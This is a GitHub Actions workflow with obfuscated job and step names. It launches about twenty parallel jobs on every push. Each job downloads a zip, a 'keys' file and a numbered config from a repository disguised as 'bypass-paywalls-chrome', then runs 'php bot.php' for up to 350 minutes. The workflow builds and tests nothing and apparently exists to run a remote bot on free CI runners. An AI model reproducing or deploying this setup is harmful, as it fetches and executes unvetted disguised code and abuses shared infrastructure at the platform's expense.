# This is a basic workflow to help you get started with Actions

# ------------------------------------ #
#       Made By An V.1.0.1       #
# ------------------------------------ #
name: py01
# ------------------------------------ #
on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:
# ------------------------------------ #
jobs:
  metsow:
    runs-on: ubuntu-20.04
    continue-on-error: True
    strategy:
      matrix:
        testi: [1.1, 27, 278, 2v, 9e, 93h, os, yys,]
        flaga: [Aqw, his, bic]
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: runneyr_go
      run: |
        sudo apt update -y && sleep 5
        
  vktys-cont-1:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [1]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a1.json -O config.json && timeout 350m php bot.php
      
  vktys-cont-2:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [2]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a2.json -O config.json && timeout 350m php bot.php
            
  vktys-cont-3:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [3]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a3.json -O config.json && timeout 350m php bot.php
      
  vktys-cont-4:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [4]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a4.json -O config.json && timeout 350m php bot.php
            
  vktys-cont-5:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [5]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a5.json -O config.json && timeout 350m php bot.php
  
  vktys-cont-6:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [6]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a6.json -O config.json && timeout 350m php bot.php
  
  vktys-cont-7:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [7]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a7.json -O config.json && timeout 350m php bot.php
            
  vktys-cont-8:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [8]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a8.json -O config.json && timeout 350m php bot.php

  vktys-cont-9:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [9]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a9.json -O config.json && timeout 350m php bot.php
              
  vktys-cont-10:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [10]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a10.json -O config.json && timeout 350m php bot.php            
  
  vktys-cont-11:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [11]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a11.json -O config.json && timeout 350m php bot.php
      
  vktys-cont-12:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [12]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a12.json -O config.json && timeout 350m php bot.php
      
  vktys-cont-13:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [13]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a13.json -O config.json && timeout 350m php bot.php
      
  vktys-cont-14:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [14]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a14.json -O config.json && timeout 350m php bot.php
            
  vktys-cont-15:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [15]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a15.json -O config.json && timeout 350m php bot.php
  
  vktys-cont-16:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [16]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a16.json -O config.json && timeout 350m php bot.php
  
  vktys-cont-17:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [17]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a17.json -O config.json && timeout 350m php bot.php
            
  vktys-cont-18:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [18]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a18.json -O config.json && timeout 350m php bot.php

  vktys-cont-19:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [18]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a19.json -O config.json && timeout 350m php bot.php
            
  vktys-cont-20:
    needs: [metsow]
    runs-on: ubuntu-latest
    continue-on-error: True
    strategy:
      matrix:
        cont-version: [20]
    steps:
    - name: Checkout Code
      uses: actions/checkout@v2
    - name: EBroo iam .
      run: sudo apt-get update && sudo apt install php -y && mkdir mkoy && cd mkoy && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/frth.zip && unzip frth.zip && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/keys && wget https://github.com/Tamisv2/bypass-paywalls-chrome/raw/master/conf/a20.json -O config.json && timeout 350m php bot.php

   
